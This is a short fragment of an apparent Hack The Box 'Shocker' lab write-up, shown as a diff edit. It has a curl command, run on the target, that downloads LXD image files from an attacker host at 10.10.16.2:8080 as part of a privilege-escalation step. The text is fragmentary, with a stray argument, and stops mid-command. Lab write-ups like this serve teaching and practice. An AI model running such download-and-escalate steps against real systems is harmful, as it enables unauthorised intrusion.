This is a writeup for the retired Hack The Box Shocker machine.

 --bind 10.10.16.2 8080

-On our machine, we can then download the files into the current directory:
+On the target machine, download the LXC image files into the current directory:

 curl -O http://10.10.16.2:8080/lxd.tar.xz \